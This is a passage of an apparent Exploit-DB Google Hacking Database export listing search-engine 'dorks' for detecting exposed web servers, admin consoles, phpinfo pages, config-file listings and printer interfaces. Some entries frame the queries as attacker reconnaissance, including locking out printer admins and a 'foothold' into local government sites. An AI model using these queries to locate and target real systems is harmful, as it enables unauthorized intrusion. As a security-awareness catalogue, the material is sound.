https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>-pub -pool intitle:&quot;index of&quot; &quot;Served by&quot; &quot;Web Server&quot;</query>
<querystring>https://www.google.com/search?q=-pub -pool intitle:&quot;index of&quot; &quot;Served by&quot; &quot;Web Server&quot;</querystring>
<edb></edb>
<date>2020-01-27</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>52</id>
<link>https://www.exploit-db.com/ghdb/52</link>
<category>Web Server Detection</category>
<shortDescription>aboutprinter.shtml (More Xerox printers on the web!)</shortDescription>
<textualDescription>More Xerox printers on the web! Google found these printers. Should their management interface be open to the WHOLE INTERNET? I think not.</textualDescription>
<query>aboutprinter.shtml</query>
<querystring>https://www.google.com/search?q=aboutprinter.shtml&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2003-08-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>6613</id>
<link>https://www.exploit-db.com/ghdb/6613</link>
<category>Web Server Detection</category>
<shortDescription>allintext:&quot;Index Of&quot; &quot;sftp-config.json&quot;</shortDescription>
<textualDescription>Dear Team,
# Exploit Title: allintext:&quot;Index Of&quot; &quot;sftp-config.json&quot;
# Google Dork: allintext:&quot;Index Of&quot; &quot;sftp-config.json&quot;
# Date: 14/10/2020
# Exploit Author: Sajan Dhakate
Please find the attached txt file.
*Thanks &amp; Regards*
*Sajan Dhakate*
</textualDescription>
<query>allintext:&quot;Index Of&quot; &quot;sftp-config.json&quot;</query>
<querystring>https://www.google.com/search?q=allintext:&quot;Index Of&quot; &quot;sftp-config.json&quot;</querystring>
<edb></edb>
<date>2020-10-14</date>
<author>Sajan Dhakate</author>
</entry>
<entry>
<id>764</id>
<link>https://www.exploit-db.com/ghdb/764</link>
<category>Web Server Detection</category>
<shortDescription>allintext:&quot;Powered by LionMax Software&quot; &quot;WWW File Share&quot;</shortDescription>
<textualDescription>WWW File Share Pro is a small HTTP server that can help you share files with your friends. They can download files from your computer or upload files from theirs. Simply specify a directory for downloads and a directory for uploads. All servers can be accessed anonymously</textualDescription>
<query>allintext:&quot;Powered by LionMax Software&quot; &quot;WWW File Share&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=allintext%3A%22Powered+by+LionMax+Software%22+%22WWW+File+Share%22&amp;btnG=Zoeken&amp;lr=</querystring>
<edb></edb>
<date>2004-12-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>6547</id>
<link>https://www.exploit-db.com/ghdb/6547</link>
<category>Web Server Detection</category>
<shortDescription>allintitle:&quot;Pi-hole Admin Console&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;Pi-hole Admin Console&quot;
# Pi-hole Admin Consoles.
# Date: 17/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>allintitle:&quot;Pi-hole Admin Console&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Pi-hole Admin Console&quot;</querystring>
<edb></edb>
<date>2020-09-17</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>132</id>
<link>https://www.exploit-db.com/ghdb/132</link>
<category>Web Server Detection</category>
<shortDescription>allintitle:Netscape FastTrack Server Home Page</shortDescription>
<textualDescription>This finds default installations of Netscape Fasttrack Server. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps.</textualDescription>
<query>allintitle:Netscape FastTrack Server Home Page</query>
<querystring>https://www.google.com/search?q=allintitle:Netscape+FastTrack+Server+Home+Page&amp;oe=UTF-8</querystring>
<edb></edb>
<date>2004-03-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>290</id>
<link>https://www.exploit-db.com/ghdb/290</link>
<category>Web Server Detection</category>
<shortDescription>allinurl:&quot;.nsconfig&quot; -sample -howto -tutorial</shortDescription>
<textualDescription>Access to a Web server's content, CGI scripts, and configuration files is controlled by entries in an access file. On Apache and NCSA Web servers the file is .htaccess, on Netscape servers it is .nsconfig.These files associate users, groups, and IP addresses with various levels of permissions: GET (read), POST (execute), PUT (write), and DELETE. For example, a FrontPage author would have permission to use HTTP POST commands (to save new content), and a user with browse permissions would be permitted to use HTTP GET commands (to read content).</textualDescription>
<query>allinurl:&quot;.nsconfig&quot; -sample -howto -tutorial</query>
<querystring>https://www.google.com/search?num=100&amp;safe=active&amp;q=allinurl%3A%22.nsconfig%22+-sa</querystring>
<edb></edb>
<date>2004-06-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4</id>
<link>https://www.exploit-db.com/ghdb/4</link>
<category>Web Server Detection</category>
<shortDescription>Apache online documentation</shortDescription>
<textualDescription>When you install the Apache web server, you get a nice set of online documentation. When you learn how to use Apache, your supposed to delete these online Apache manuals. These sites didn't. If they're in such a hurry with Apache installs, I wonder what else they rushed through?</textualDescription>
<query>intitle:&quot;Apache HTTP Server&quot; intitle:&quot;documentation&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Apache+HTTP+Server%22+intitle%3A%22documentation%22</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>4977</id>
<link>https://www.exploit-db.com/ghdb/4977</link>
<category>Web Server Detection</category>
<shortDescription>Coldbox | contentbox | commandbox &quot;Powered by ContentBox&quot;</shortDescription>
<textualDescription>ContentBox content management tools and CMS.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>Coldbox | contentbox | commandbox &quot;Powered by ContentBox&quot;</query>
<querystring>https://www.google.com/search?q=Coldbox | contentbox | commandbox &quot;Powered by ContentBox&quot;</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7968</id>
<link>https://www.exploit-db.com/ghdb/7968</link>
<category>Web Server Detection</category>
<shortDescription>Dork</shortDescription>
<textualDescription> Google Dork: inurl:/geoserver/web/
# Web Server Detection
# Date:15/07/2022
# Exploit Author: isa ghojaria</textualDescription>
<query>Dork</query>
<querystring>https://www.google.com/search?q=Dork</querystring>
<edb></edb>
<date>2022-07-15</date>
<author>isa ghojaria</author>
</entry>
<entry>
<id>303</id>
<link>https://www.exploit-db.com/ghdb/303</link>
<category>Web Server Detection</category>
<shortDescription>Environment vars</shortDescription>
<textualDescription>This is a generic way of grabbing those CGI-spewed environmental var lists. To narrow to things down, an attacker could use any of the following: SERVER_SIGNATURE, SERVER_SOFTWARE, TNS_ADMIN, DOCUMENT_ROOT, etc.</textualDescription>
<query>HTTP_USER_AGENT=Googlebot</query>
<querystring>https://www.google.com/search?q=HTTP_USER_AGENT=Googlebot&amp;oe=UTF-8</querystring>
<edb></edb>
<date>2004-07-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>6615</id>
<link>https://www.exploit-db.com/ghdb/6615</link>
<category>Web Server Detection</category>
<shortDescription>ext:php | intitle:phpinfo &quot;published by the PHP Group&quot;</shortDescription>
<textualDescription>Author: Rahul Parmar
Google Dork: ext:php | intitle:phpinfo &quot;published by the PHP Group&quot;
Expose PHPinfo file
</textualDescription>
<query>ext:php | intitle:phpinfo &quot;published by the PHP Group&quot;</query>
<querystring>https://www.google.com/search?q=ext:php | intitle:phpinfo &quot;published by the PHP Group&quot;</querystring>
<edb></edb>
<date>2020-10-15</date>
<author>Rahul Parmar</author>
</entry>
<entry>
<id>4402</id>
<link>https://www.exploit-db.com/ghdb/4402</link>
<category>Web Server Detection</category>
<shortDescription>ext:svc inurl:wsdl</shortDescription>
<textualDescription>this dork will return Web Services Description Language which will expose
webservices
submitted by: Mohammad Al-Nasser</textualDescription>
<query>ext:svc inurl:wsdl</query>
<querystring>https://www.google.com/search?q=ext:svc inurl:wsdl</querystring>
<edb></edb>
<date>2017-03-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>4024</id>
<link>https://www.exploit-db.com/ghdb/4024</link>
<category>Web Server Detection</category>
<shortDescription>filetype:asmx inurl:(_vti_bin|api|webservice)</shortDescription>
<textualDescription>this dork will return web service .</textualDescription>
<query>filetype:asmx inurl:(_vti_bin|api|webservice)</query>
<querystring>https://www.google.com/search?q=filetype:asmx inurl:(_vti_bin|api|webservice)</querystring>
<edb></edb>
<date>2015-06-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>6943</id>
<link>https://www.exploit-db.com/ghdb/6943</link>
<category>Web Server Detection</category>
<shortDescription>filetype:axd inurl:/elmah.axd</shortDescription>
<textualDescription># Title: Sensitive Information Disclosure
# Google Dork: filetype:axd inurl:/elmah.axd
# Date: 18/05/2021
# Author: Prajwal Khante
</textualDescription>
<query>filetype:axd inurl:/elmah.axd</query>
<querystring>https://www.google.com/search?q=filetype:axd inurl:/elmah.axd</querystring>
<edb></edb>
<date>2021-05-18</date>
<author>Prajwal Khante</author>
</entry>
<entry>
<id>360</id>
<link>https://www.exploit-db.com/ghdb/360</link>
<category>Web Server Detection</category>
<shortDescription>fitweb-wwws * server at intitle:index.of</shortDescription>
<textualDescription>The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.</textualDescription>
<query>fitweb-wwws * server at intitle:index.of</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=fitweb-wwws+*+server+at+intitle%3Aindex.of</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>7428</id>
<link>https://www.exploit-db.com/ghdb/7428</link>
<category>Web Server Detection</category>
<shortDescription>Fwd: intitle:&quot;STEP by STIBO Systems&quot; &quot;Launch STEPworkbench&quot; &quot;Web UI Component Report&quot;</shortDescription>
<textualDescription># Google Dork: Fwd: intitle:&quot;STEP by STIBO Systems&quot; &quot;Launch STEPworkbench&quot; &quot;Web UI Component Report&quot;
# Web Server Detection
# Date:10/10/2021
# Exploit Author: Mugdha Bansode</textualDescription>
<query>Fwd: intitle:&quot;STEP by STIBO Systems&quot; &quot;Launch STEPworkbench&quot; &quot;Web UI Component Report&quot;</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;STEP by STIBO Systems&quot; &quot;Launch STEPworkbench&quot; &quot;Web UI Component Report&quot;</querystring>
<edb></edb>
<date>2021-10-15</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>14</id>
<link>https://www.exploit-db.com/ghdb/14</link>
<category>Web Server Detection</category>
<shortDescription>IIS 4.0</shortDescription>
<textualDescription>Moving from personal, lightweight web servers into more production-ready software, we find that even administrators of Microsoft's Internet Information Server (IIS) sometimes don't have a clue what they're doing. By searching on web pages with titles of &quot;Welcome to IIS 4.0&quot; we find that even if they've taken the time to change their main page, some dorks forget to change the titles of their default-installed web pages. This is an indicator that their web server is most likely running, or was upgraded from, the now considered OLD IIS 4.0 and that at least portions of their main pages are still exactly the same as they were out of the box. Conclusion? The rest of the factory-installed stuff is most likely lingering around on these servers as well. Old code: FREE with operating system.Poor content management: an average of $40/hour. Factory-installed default scripts: FREE with operating system.Getting hacked by a script kiddie that found you on Google: PRICELESS.For all the things money can't buy, there's a googleDork award.</textualDescription>
<query>intitle:&quot;Welcome to IIS 4.0&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Welcome+to+IIS+4.0%22&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>51</id>
<link>https://www.exploit-db.com/ghdb/51</link>
<category>Web Server Detection</category>
<shortDescription>index_i.shtml Ready (Xerox printers on the web!)</shortDescription>
<textualDescription>These printers are not-only web-enabled, but their management interface somehow got crawled by google! These puppies should not be public! You can really muck with these printers. In some cases, going to the &quot;password.shtml&quot; page, you can even lock out the admins if a username and password has not already been set! Thanks to mephisteau@yahoo.co.uk for the idea =)</textualDescription>
<query>i_index.shtml Ready</query>
<querystring>https://www.google.com/search?q=i%5Findex%2Eshtml+%22Ready%22</querystring>
<edb></edb>
<date>2003-08-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>5076</id>
<link>https://www.exploit-db.com/ghdb/5076</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot; - 2019 Cott Systems, Inc.&quot;</shortDescription>
<textualDescription>AUTHOR: FlyingFrog
Twitter: @ItsKarl0z
++ Local Government Websites (American) ++
intext:&quot; - 2019 Cott Systems, Inc.&quot;
Cott Systems develops a lot of the local government document
search portals in the U.S.
Data you can find:
- Search Portals for:
- Clerk Offices
- Personal Data
- Property Data (Tax, Debt, Deed etc.)
- Internal Search engines
- Foothold in potentially vulnerable .gov Websites
- local government is usually not well funded, their cybersecurity is not very good
chances of finding bugs are very high
++ 307 results at the time of writing ++
DISCLAIMER:
The vulnerabilities are suggestions, none of them have been tested by me,
always request permission before testing anything on someone else system.
This dork is made by myself, I give you permission to share it as you please,
I would appreciate a shoutout !
</textualDescription>
<query>intext:&quot; - 2019 Cott Systems, Inc.&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot; - 2019 Cott Systems, Inc.&quot;</querystring>
<edb></edb>
<date>2019-01-14</date>
<author>FlyingFrog</author>
</entry>
<entry>
<id>435</id>
<link>https://www.exploit-db.com/ghdb/435</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot;404 Object Not Found&quot; Microsoft-IIS/5.0</shortDescription>
<textualDescription>This search finds IIS 5.0 error pages = IIS 5.0 Server</textualDescription>
<query>intext:&quot;404 Object Not Found&quot; Microsoft-IIS/5.0</query>
<querystring>https://www.google.com/search?q=intext%3A%22404+Object+Not+Found%22+Microsoft-IIS%2F5.0</querystring>
<edb></edb>
<date>2004-08-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>5258</id>
<link>https://www.exploit-db.com/ghdb/5258</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot;Brought to you by eVetSites&quot;</shortDescription>
<textualDescription>List of sites all hosted by eVetSites, hosting platform for veterinarians
Zerconil
</textualDescription>
<query>intext:&quot;Brought to you by eVetSites&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Brought to you by eVetSites&quot;</querystring>
<edb></edb>
<date>2019-06-17</date>
<author>Zerconil</author>
</entry>
<entry>
<id>6686</id>
<link>https://www.exploit-db.com/ghdb/6686</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot;Healthy&quot; + &quot;Product model&quot; + &quot; Client IP&quot; + &quot;Ethernet&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Healthy&quot; + &quot;Product model&quot; + &quot; Client IP&quot; + &quot;Ethernet&quot;
# Cisco Meraki configuration panels with juicy info...
# Date: 18/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Healthy&quot; + &quot;Product model&quot; + &quot; Client IP&quot; + &quot;Ethernet&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Healthy&quot; + &quot;Product model&quot; + &quot; Client IP&quot; + &quot;Ethernet&quot;</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6318</id>
<link>https://www.exploit-db.com/ghdb/6318</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot;index of /&quot; &quot;Index of&quot; access_log</shortDescription>
<textualDescription>intext:&quot;index of /&quot; &quot;Index of&quot; access_log
BY
Rishabh Chaplot
Thank You!
----
Regards,
Rishabh Chaplot
</textualDescription>
<query>intext:&quot;index of /&quot; &quot;Index of&quot; access_log</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of /&quot; &quot;Index of&quot; access_log</querystring>
<edb></edb>
<date>2020-06-22</date>
<author>Rishabh Chaplot</author>
</entry>
<entry>
<id>4981</id>
<link>https://www.exploit-db.com/ghdb/4981</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot;Powered by (Quantum | Quantum CMS | CMS)</shortDescription>
<textualDescription>Sites using Quantum CMS builder
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intext:&quot;Powered by (Quantum | Quantum CMS | CMS)</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by (Quantum | Quantum CMS | CMS)</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5027</id>
<link>https://www.exploit-db.com/ghdb/5027</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot;Powered by Abyss Web Server&quot;</shortDescription>
<textualDescription>Machines running Abyss web server.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
@brulliant
</textualDescription>
<query>intext:&quot;Powered by Abyss Web Server&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by Abyss Web Server&quot;</querystring>
<edb></edb>
<date>2018-11-14</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5249</id>
<link>https://www.exploit-db.com/ghdb/5249</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot;Powered by GetSimple&quot; -site:get-simple.info</shortDescription>
<textualDescription>This will find sites using the GetSimple CMS.
</textualDescription>
<query>intext:&quot;Powered by GetSimple&quot; -site:get-simple.info</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by GetSimple&quot; -site:get-simple.info</querystring>
<edb></edb>
<date>2019-06-06</date>
<author>Dec0y</author>
</entry>
<entry>
<id>4976</id>
<link>https://www.exploit-db.com/ghdb/4976</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot;Powered by Nesta&quot;</shortDescription>
<textualDescription> Nesta, a Ruby CMS
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intext:&quot;Powered by Nesta&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by Nesta&quot;</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5006</id>
<link>https://www.exploit-db.com/ghdb/5006</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot;Powered by phpSQLiteCMS&quot; | intitle:&quot;phpSQLiteCMS - A simple &amp; lightweight CMS&quot;</shortDescription>
<textualDescription>phpSQLiteCMS detect
ManhNho
</textualDescription>
<query>intext:&quot;Powered by phpSQLiteCMS&quot; | intitle:&quot;phpSQLiteCMS - A simple &amp; lightweight CMS&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by phpSQLiteCMS&quot; | intitle:&quot;phpSQLiteCMS - A simple &amp; lightweight CMS&quot;</querystring>
<edb></edb>
<date>2018-11-01</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4958</id>
<link>https://www.exploit-db.com/ghdb/4958</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot;Powered by Sentora&quot; -github.com</shortDescription>
<textualDescription>Sites using Sentora CMS.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intext:&quot;Powered by Sentora&quot; -github.com</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by Sentora&quot; -github.com</querystring>
<edb></edb>
<date>2018-09-20</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4980</id>
<link>https://www.exploit-db.com/ghdb/4980</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot;Powered by Typesetter&quot;</shortDescription>
<textualDescription>Typesetter CMS dorks
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intext:&quot;Powered by Typesetter&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by Typesetter&quot;</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6730</id>
<link>https://www.exploit-db.com/ghdb/6730</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot;SonarQube&quot; + &quot;by SonarSource SA.&quot; + &quot;LGPL v3&quot;</shortDescription>
<textualDescription>#Google Dork: intext:&quot;SonarQube&quot; + &quot;by SonarSource SA.&quot; + &quot;LGPL v3&quot;
#Description: viewing various source codes of business applications
#Author: Paulo Gualter (https://www.linkedin.com/in/paulogualter)
</textualDescription>
<query>intext:&quot;SonarQube&quot; + &quot;by SonarSource SA.&quot; + &quot;LGPL v3&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;SonarQube&quot; + &quot;by SonarSource SA.&quot; + &quot;LGPL v3&quot;</querystring>
<edb></edb>
<date>2021-01-05</date>
<author>Paulo Gualter</author>
</entry>
<entry>
<id>1363</id>
<link>https://www.exploit-db.com/ghdb/1363</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot;Target Multicast Group&quot; &quot;beacon&quot;</shortDescription>
<textualDescription>&quot;... Multicast Beacon is a multicast diagnostic tool written in Perl which uses the RTP protocol (RFC3550) to provide useful statistics and diagnostic information about a given multicast group's connectivity characteristics.Multicast is a way of distributing IP packets to a set of machines which have expressed an interest in receiving them. It is a one-to-many distribution model suitable for video conferencing and other forms of data sharing over the network.&quot;see h**p://beacon.dast.nlanr.net</textualDescription>
<query>intext:&quot;Target Multicast Group&quot; &quot;beacon&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intext%3A%22Target+Multicast+Group%22+%22beacon%22</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>5884</id>
<link>https://www.exploit-db.com/ghdb/5884</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot;This is the default welcome page used to test the correct operation of the Apache2 server&quot;</shortDescription>
<textualDescription>Category: Web Server Detection
Nicholas Doropoulos</textualDescription>
<query>intext:&quot;This is the default welcome page used to test the correct operation of the Apache2 server&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;This is the default welcome page used to test the correct operation of the Apache2 server&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>4597</id>
<link>https://www.exploit-db.com/ghdb/4597</link>
<category>Web Server Detection</category>
<shortDescription>intext:&quot;Welcome to CodeIgniter!&quot;</shortDescription>
<textualDescription>Google dork which helps to identify CodeIgniter applications
- Anand</textualDescription>
<query>intext:&quot;Welcome to CodeIgniter!&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Welcome to CodeIgniter!&quot;</querystring>
<edb></edb>
<date>2017-10-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4203</id>
<link>https://www.exploit-db.com/ghdb/4203</link>
<category>Web Server Detection</category>
<shortDescription>intext:Apache/2.2.29 (Unix) mod_ssl/2.2.29 | intitle:&quot;Index of /&quot;</shortDescription>
<textualDescription>Server Name and Port.
-Xploit </textualDescription>
<query>intext:Apache/2.2.29 (Unix) mod_ssl/2.2.29 | intitle:&quot;Index of /&quot;</query>
<querystring>https://www.google.com/search?q=intext:Apache/2.2.29 (Unix) mod_ssl/2.2.29 | intitle:&quot;Index of /&quot;</querystring>
<edb></edb>
<date>2016-02-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>5016</id>
<link>https://www.exploit-db.com/ghdb/5016</link>
<category>Web Server Detection</category>
<shortDescription>intitle: &quot;Welcome to nginx!&quot; + &quot;Thank you for using nginx.&quot;</shortDescription>
<textualDescription>nginx detect
ManhNho
</textualDescription>
<query>intitle: &quot;Welcome to nginx!&quot; + &quot;Thank you for using nginx.&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;Welcome to nginx!&quot; + &quot;Thank you for using nginx.&quot;</querystring>
<edb></edb>
<date>2018-11-07</date>
<author>ManhNho</author>
</entry>
<entry>
<id>226</id>
<link>https://www.exploit-db.com/ghdb/226</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;300 multiple choices&quot;</shortDescription>
<textualDescription>This search shows sites that have the 300 error code, but also reveal a server tag at the bottom of the page that an attacker could use to profile a system.</textualDescription>
<query>intitle:&quot;300 multiple choices&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22300+multiple+choices%22+intext:server.at&amp;start=90&amp;sa=N</querystring>
<edb></edb>
<date>2004-05-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>6891</id>
<link>https://www.exploit-db.com/ghdb/6891</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Accueil WAMPSERVER&quot; intext:&quot;Configuration Serveur&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Accueil WAMPSERVER&quot; intext:&quot;Configuration Serveur&quot;
# Web Server Detection
# Date: 23/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Accueil WAMPSERVER&quot; intext:&quot;Configuration Serveur&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Accueil WAMPSERVER&quot; intext:&quot;Configuration Serveur&quot;</querystring>
<edb></edb>
<date>2021-04-23</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>1355</id>
<link>https://www.exploit-db.com/ghdb/1355</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Apache Status&quot; &quot;Apache Server Status for&quot;</shortDescription>
<textualDescription>New Apache Server Status Dork</textualDescription>
<query>intitle:&quot;Apache Status&quot; &quot;Apache Server Status for&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Apache+Status%22+%22Apache+Server+Status+for%22&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>4206</id>
<link>https://www.exploit-db.com/ghdb/4206</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Apache Status&quot; | intext:&quot;Apache Server Status&quot;</shortDescription>
<textualDescription>This dork gives,
Apache Server Status
Server Version:
Server Built:
Current Time:
Restart Time:
Parent Server Generation:
Server uptime:
-Xploit</textualDescription>
<query>intitle:&quot;Apache Status&quot; | intext:&quot;Apache Server Status&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Apache Status&quot; | intext:&quot;Apache Server Status&quot;</querystring>
<edb></edb>
<date>2016-02-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4867</id>
<link>https://www.exploit-db.com/ghdb/4867</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;apache tomcat/&quot; &quot;Apache Tomcat examples&quot;</shortDescription>
<textualDescription> This dork show many example of Server Apache Tomcat.
KhanhNNVN
</textualDescription>
<query>intitle:&quot;apache tomcat/&quot; &quot;Apache Tomcat examples&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;apache tomcat/&quot; &quot;Apache Tomcat examples&quot;</querystring>
<edb></edb>
<date>2018-06-22</date>
<author>KhanhNNVN</author>
</entry>
<entry>
<id>4804</id>
<link>https://www.exploit-db.com/ghdb/4804</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;apache tomcat/&quot; + &quot;Find additional important configuration information in:&quot;</shortDescription>
<textualDescription>intitle:&quot;apache tomcat/&quot; + &quot;Find additional important configuration
information in:&quot;
Apache Tomcat web server detected!!!
ManhNho
</textualDescription>
<query>intitle:&quot;apache tomcat/&quot; + &quot;Find additional important configuration information in:&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;apache tomcat/&quot; + &quot;Find additional important configuration information in:&quot;</querystring>
<edb></edb>
<date>2018-05-07</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4802</id>
<link>https://www.exploit-db.com/ghdb/4802</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Apache2 Debian Default Page: It works&quot;</shortDescription>
<textualDescription>intitle:&quot;Apache2 Debian Default Page: It works&quot;
Default Apache2 html page
ManhNho
</textualDescription>
<query>intitle:&quot;Apache2 Debian Default Page: It works&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Apache2 Debian Default Page: It works&quot;</querystring>
<edb></edb>
<date>2018-05-03</date>
<author>ManhNho</author>
</entry>
<entry>
<id>5311</id>
<link>https://www.exploit-db.com/ghdb/5311</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Apache2 Ubuntu Default Page: It works&quot;</shortDescription>
<textualDescription>web server detection:
intitle:&quot;Apache2 Ubuntu Default Page: It works&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;Apache2 Ubuntu Default Page: It works&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Apache2 Ubuntu Default Page: It works&quot;</querystring>
<edb></edb>
<date>2019-07-31</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4715</id>
<link>https://www.exploit-db.com/ghdb/4715</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Axis Happiness Page&quot; &quot;Examining webapp configuration&quot;</shortDescription>
<textualDescription>Reveals sensitive information including a full path disclosure in Apache Axis
Alwin Warringa</textualDescription>
<query>intitle:&quot;Axis Happiness Page&quot; &quot;Examining webapp configuration&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Axis Happiness Page&quot; &quot;Examining webapp configuration&quot;</querystring>
<edb></edb>
<date>2018-03-27</date>
<author>Alwin Warringa</author>
</entry>
<entry>
<id>1378</id>
<link>https://www.exploit-db.com/ghdb/1378</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;BadBlue: the file-sharing web server anyone can use&quot;</shortDescription>
<textualDescription>Badblue file sharing web server detection</textualDescription>
<query>intitle:&quot;BadBlue: the file-sharing web server anyone can use&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22BadBlue%3A+the+file-sharing+web+server+anyone+can+use%22</querystring>
<edb></edb>
<date>2006-05-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>6918</id>
<link>https://www.exploit-db.com/ghdb/6918</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Current Network Status&quot; &quot;Nagios&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Current Network Status&quot; &quot;Nagios&quot;
# Various Nagios Status pages.
# Date: 28/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Current Network Status&quot; &quot;Nagios&quot;</query>
